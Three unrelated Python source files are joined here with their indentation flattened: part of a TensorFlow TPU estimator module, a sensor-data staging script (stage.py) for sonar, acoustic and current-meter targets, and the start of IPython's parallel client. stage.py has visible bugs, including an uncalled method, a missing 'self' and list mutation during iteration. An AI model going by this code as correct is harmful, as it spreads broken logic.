iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(
features,
computation,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn,
labels,
config,
params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts computation on TPU, add batching around it and round robin computation
between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@batch_ops.batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
|
stage.py
|
import random
import threading
import numpy as np
import datetime
from rules import SendTriggers
from targets import Target
import config
import time
class Stage:
""""""
def __init__(self, processor, target_space, send_triggers, source=config.site_name):
self.processor = processor
self.target_space = target_space
self.send_triggers = send_triggers
self.data_queues = {}
for stream in config.data_streams:
self.data_queues[stream] = []
# NIMS grouped by target_id, so change to dict {target_id: [indices]}
self.data_queues['nims'] = {}
self.recent_targets = []
# Adds ADCP (necessary for testing when not connected to ADCP)
unixtime = (datetime.datetime.utcnow() - datetime.datetime(1970,1,1))
self.addDataToStage('adcp', [unixtime.days*24*60*60 + unixtime.seconds, 1.2, 4.5])
self.startStageProcessing()
def processDataBeforeStage(self, stream, data):
"""Performs whatever preprocessing necessitated for data from a
particular stream, adds data to appropriate target list, then returns
index for added data in TargetSpace.
Assumes 'nims' passes a list inside a dict with different tracks.
"""
if stream == 'adcp':
data = [datetime.datetime.fromtimestamp(data[0]), data[1], data[2]]
indices = self.target_space.append_entry(stream, data)
elif stream == 'pamguard':
# comm format matches desired, no need to change
indices = self.target_space.append_entry(stream, data)
elif stream == 'nims':
indices = {}
timestamp = data[0]
for track in data[1]:
new_data = [timestamp, track['id'], track['pings_visible'],
track['first_ping'], track['target_strength'], track['width'],
track['height'], track['size_sq_m'], track['speed_mps'],
track['min_angle_m'], track['min_range_m'], track['max_angle_m'],
track['max_range_m'], track['last_pos_bearing'],
track['last_pos_range'], None]
indices[track['id']] = self.target_space.append_entry(stream, new_data)
elif stream in config.data_streams:
raise ValueError("No stage processing functionality exists for" \
" data stream {0}.".format(stream))
else:
raise ValueError("Error processing data for stage. Stream {0} not" \
" defined in config file.".format(stream))
return indices
def addDataToStage(self, stream, data):
"""Calls processing function for data based on stream then adds data to
stream-specific queue.
"""
if stream not in config.data_streams:
raise ValueError("Error adding data to stage. Data stream {0} not" \
" defined in config file.".format(stream))
stage_indices = self.processDataBeforeStage(stream, data)
if stream == 'nims': # indexed
for track_id in stage_indices:
if track_id not in self.data_queues[stream]:
self.data_queues[stream][track_id] = []
self.data_queues[stream][track_id].append(stage_indices[track_id])
elif stream == 'pamguard' or stream == 'adcp': # one at any time
self.data_queues[stream] = stage_indices
else:
self.data_queues[stream].append(stage_indices) # can have multiple
def createOrUpdateTarget(self, nims=[], pamguard=[], adcp=[]):
"""Appends or creates a Target instance based on current staged data."""
if pamguard != [] and nims == []:
for target in self.recent_targets:
# Data is captured in a nims+pamguard Target that will be saved, ignore
if target.indices.get('pamguard') == pamguard:
break
else:
# Data not captured in any other Targets, create a new one
target_out = Target(target_space=self.target_space,
source=config.site_name + "_auto",
firstseen=self.target_space.get_entry_value_by_index('pamguard', pamguard, 'timestamp'),
lastseen=self.target_space.get_entry_value_by_index('pamguard', pamguard, 'timestamp'),
indices={'pamguard': pamguard, 'adcp': adcp})
target_out.update_classifier_table
self.recent_targets.append(target_out)
return target_out
elif nims != [] and nims[1] != []:
#print("nims[0]:", nims[0], "nims[1]:", nims[1])
for target in self.recent_targets:
if target.get_entry_value('nims', 'id') == nims[0]:
# There's an existing target with that id, update that Target object
target.update_entry('nims', nims[1])
return target
else:
if pamguard:
first_timestamp = min(self.target_space.get_entry_value_by_index('pamguard', pamguard[-1], 'timestamp'),
self.target_space.get_entry_value_by_index('nims', nims[1][0],'timestamp'))
latest_timestamp = max(self.target_space.get_entry_value_by_index('pamguard', pamguard[-1], 'timestamp'),
self.target_space.get_entry_value_by_index('nims', nims[1][-1],'timestamp'))
else:
first_timestamp = self.target_space.get_entry_value_by_index('nims', nims[1][0],'timestamp')
latest_timestamp = self.target_space.get_entry_value_by_index('nims', nims[1][-1],'timestamp')
pamguard = None
if len(nims[1]) == 1:
# We don't have existing targets and only one index in queue
self.target_space.tables['nims'][nims[1][0]][-1] = [] # changes agg_indices to []
target_out = Target(target_space=self.target_space,
source=config.site_name + "_auto",
firstseen=first_timestamp,
lastseen=latest_timestamp,
indices={'nims': nims[1][0], 'pamguard': pamguard, 'adcp': adcp})
self.recent_targets.append(target_out)
return target_out
elif len(nims[1]) > 1:
# We don't have existing targets, but multiple indices in queue
combined_entry = self.target_space.combine_entries('nims', nims[1])
index = self.target_space.append_entry('nims', combined_entry)
target_out = Target(target_space=self.target_space,
source=config.site_name + "_auto",
firstseen=first_timestamp,
lastseen=latest_timestamp,
indices={'nims': index, 'pamguard': pamguard, 'adcp': adcp})
self.recent_targets.append(target_out)
return target_out
def startStageProcessing(self):
"""Creates thread, starts loop that processes stage data."""
threading.Thread(target=self.processEligibleStagedData).start()
# Should be looping. That way, we can check time-based conditions.
def processEligibleStagedData(self):
"""Deletes, classifies, or sends data to rules if eligible."""
# Only try to create new target in potential pamguard only case
while True:
# determine if ADCP is active
adcp_index = self.data_queues['adcp']
adcp_last_seen = self.target_space.get_entry_value_by_index('adcp', adcp_index, 'timestamp')
adcp_flag = abs(datetime.datetime.now() - adcp_last_seen) > datetime.timedelta(0,60*config.adcp_last_seen_threshold,0)
if adcp_flag:
raise Exception('ADCP has is no longer updating, cannot classify features.')
if self.data_queues['pamguard'] != []:
pamguard_exceeds_max_time = (datetime.datetime.utcnow() -
self.target_space.get_entry_value_by_index('pamguard',
self.data_queues['pamguard'],'timestamp') >= datetime.timedelta(
seconds=config.data_streams_classifier_triggers['pamguard_max_time']))
if pamguard_exceeds_max_time:
target = createOrUpdateTarget(pamguard=self.data_queues['pamguard'],
adcp=self.data_queues['adcp'])
self.data_queues['pamguard'] = []
self.recent_targets.append(target)
self.send_triggers.check_saving_rules(target, None)
self.send_triggers.send_triggers_if_ready()
track_ids_to_remove = []
track_ids_to_process = list(self.data_queues['nims'].keys())
for track_id in track_ids_to_process:
# If max_pings or max_time, create/update Target
ping_count = len(self.data_queues['nims'][track_id])
exceeds_max_pings = (ping_count >=
config.data_streams_classifier_triggers['nims_max_pings'])
exceeds_max_time = (datetime.datetime.utcnow() -
self.target_space.get_entry_value_by_index('nims',
self.data_queues['nims'][track_id][-1], 'timestamp')
>= datetime.timedelta(seconds=config.data_streams_classifier_triggers['nims_max_time']))
if exceeds_max_pings or exceeds_max_time:
target = self.createOrUpdateTarget(nims=(track_id, self.data_queues['nims'][track_id]),
pamguard=self.data_queues['pamguard'],
adcp=self.data_queues['adcp'])
track_ids_to_remove.append(track_id)
self.processor.addTargetToQueue(target)
for track_id in track_ids_to_remove: self.data_queues['nims'].pop(track_id)
for recent_target in self.recent_targets:
if (datetime.datetime.utcnow() - recent_target.lastseen).seconds >= config.drop_target_time:
print('Start removal process for Target:', recent_target.indices)
# Remove recent target from list
self.recent_targets.remove(recent_target)
# Processes any stage data remaining
#rt_nims_id = recent_target.get_entry_value('nims','id')
#if self.data_queues['nims'].get(rt_nims_id):
# new_target = self.createOrUpdateTarget(adcp=self.data_queues['adcp'],
# pamguard=self.data_queues['pamguard'],
# nims=self.data_queues['nims'].get(rt_nims_id))
#else:
# new_target = self.createOrUpdateTarget(adcp=self.data_queues['adcp'],
# pamguard=self.data_queues['pamguard'])
#if self.data_queues['nims'].get(rt_nims_id):
# self.processor.addTargetToQueue(new_target)
# Update classifier features list
self.target_space.update_classifier_tables(recent_target)
# Clear nims and pamguard
self.target_space.update(recent_target)
time.sleep(0.01)
|
client.py
|
"""A semi-synchronous Client for the ZMQ cluster
Authors:
* MinRK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
import json
import sys
from threading import Thread, Event
import time
import warnings
from datetime import datetime
from getpass import getpass
from pprint import pprint
pjoin = os.path.join
import zmq
# from zmq.eventloop import ioloop, zmqstream
from IPython.config.configurable import MultipleInstanceError
from IPython.core.application import BaseIPythonApplication
from IPython.core.profiledir import ProfileDir, ProfileDirError
from IPython.utils.coloransi import TermColors
from IPython.utils.jsonutil import rekey
from IPython.utils.localinterfaces import LOCALHOST, LOCAL_IPS
from IPython.utils.path import get_ipython_dir
from IPython.utils.py3compat import cast_bytes
from IPython.utils.traitlets import (HasTraits, Integer, Instance, Unicode,
Dict, List, Bool, Set, Any)
from IPython.external.decorator import decorator
from IPython.external.ssh import tunnel
from IPython.parallel import Reference
from IPython.parallel import error
from IPython.parallel import util
from IPython.kernel.zmq.session import Session, Message
from IPython.kernel.zmq import serialize
from .asyncresult import AsyncResult, AsyncHubResult
from .view import DirectView, LoadBalancedView
if sys.version_info[0] >= 3:
# xrange is used in a couple 'isinstance' tests in py2
# should be just 'range' in 3k
xrange = range
#--------------------------------------------------------------------------
# Decorators for Client methods
#--------------------------------------------------------------------------
@decorator
def spin_first(f, self, *args, **kwargs):
"""Call spin() to sync state prior to calling the method."""
self.spin()
return f(self, *args, **kwargs)
#--------------------------------------------------------------------------
# Classes
#--------------------------------------------------------------------------
class ExecuteReply(object):
"""wrapper for finished Execute results"""
def __init__(self, msg_id, content, metadata):
self.msg_id = msg_id
self._content = content
self.execution_count = content['execution_count']
self.metadata = metadata
def __getitem__(self, key):
return self.metadata[key]
def __getattr__(self, key):
if key not in self.metadata:
raise AttributeError(key)
return self.metadata[key]
def __repr__(self):
pyout = self.metadata['pyout'] or {'data':{}}
text_out = pyout['data'].get('text/plain', '')
if len(text_out) > 32:
text_out = text_out[:29] + '...'
return "<ExecuteReply[%i]: %s>" % (self.execution_count, text_out)
def _repr_pretty_(self, p, cycle):
pyout = self.metadata['pyout'] or {'data':{}}
text_out = pyout['data'].get('text/plain', '')
if not text_out:
return
try:
ip = get_ipython()
except NameError:
colors = "NoColor"
else:
colors = ip.colors
if colors == "NoColor":
out = normal = ""
else:
out = TermColors.Red
normal = TermColors.Normal
if '\n' in text_out and not text_out.startswith('\n'):
